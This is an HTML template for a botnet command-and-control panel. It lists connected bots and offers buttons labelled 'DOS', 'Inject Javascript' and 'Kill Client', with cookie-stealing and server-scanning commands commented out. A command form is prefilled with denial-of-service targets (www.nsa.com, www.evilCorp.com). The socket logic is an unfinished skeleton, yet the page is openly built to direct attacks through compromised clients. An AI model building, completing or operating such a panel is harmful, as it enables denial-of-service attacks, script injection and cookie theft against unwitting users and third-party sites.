<!DOCTYPE html>
<html lang="">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="">
        <meta name="author" content="">
        <title>Control Center</title>
        <link rel="shortcut icon" href="">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css">
        <style>body{padding-top:50px;}.starter-template{padding:40px 15px;text-align:center;}</style>

        <!--[if IE]>
<script src="https://cdn.jsdelivr.net/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://cdn.jsdelivr.net/respond/1.4.2/respond.min.js"></script>
<![endif]-->
    </head>

    <body>

        <div class="container">
            <div class="panel panel-success">
                <!-- Default panel contents -->
                <div class="panel-heading">Panel heading</div>
                <div class="panel-body">
                    <div class="row">
                        <div class="col-md-6">
                            <img src="spacemarines" >
                            <p>© YEAR Company_Name.</p>
                        </div>
                        <div class="col-md-6">
                            <div>
                                <h1> Bot list </h1>
                                <div class="list-group">
                                    <a href="#" data-id="" class="list-group-item">23423423</a>
                                    {{#each bots}}
                                    <a href="#" data-id="" class="list-group-item">{{@key}}</a>
                                    {{/each}}
                                </div>
                            </div>
                            <div>
                                <h1> Available commands </h1>
                                <div class="btn-group" role="group" aria-label="...">
                                    <button type="button" data-format="" class="btn btn-default">DOS</button>
                                    <button type="button" data-format="" class="btn btn-default">Inject Javascript</button>
<!--                                    <button type="button" class="btn btn-default">getCookies</button>-->
<!--                                    <button type="button" class="btn btn-default">srvScann</button>-->
                                    <button type="button" data-format="" class="btn btn-default">Kill Client</button>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="row">
                        <form role="form" action="/command/send" method="post">
                            <div class="form-group">
                                <label for="inputPassword">Commands</label>
                                <textarea name="commands" class="form-control" rows="5">{dos:[{ prot: "http", host:"www.nsa.com" , port: "80" },
                                    { prot: "https", host:"www.evilCorp.com" , port: "443" }]}</textarea>
                            </div>

                            <button type="submit" class="btn btn btn-success">
                                Send
                            </button>
                        </form>
                    </div>
                    <!--                    <div class="row">-->
                    <!-- Table -->
                    <!--
<table class="table">
<thead>
<tr>
<th>#Bot id</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<th>1</th>
<td>Mark</td>
</tr>
</tbody>
</table>
-->
                    <!--                    </div>-->
                </div>
            </div>
        </div>

        <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
        <script src="https://cdn.socket.io/socket.io-1.2.0.js"></script>
        <script src="http://code.jquery.com/jquery-1.11.1.js"></script>
        <script>
            var socket = io();
            // when a user click cmd button set html of commands to data-format
            //                socket.emit('chat message', "hello");
            // listen for bot-Join and add recieved {id: id} in the bot list
            // on form submit
        </script>
    </body>
</html>
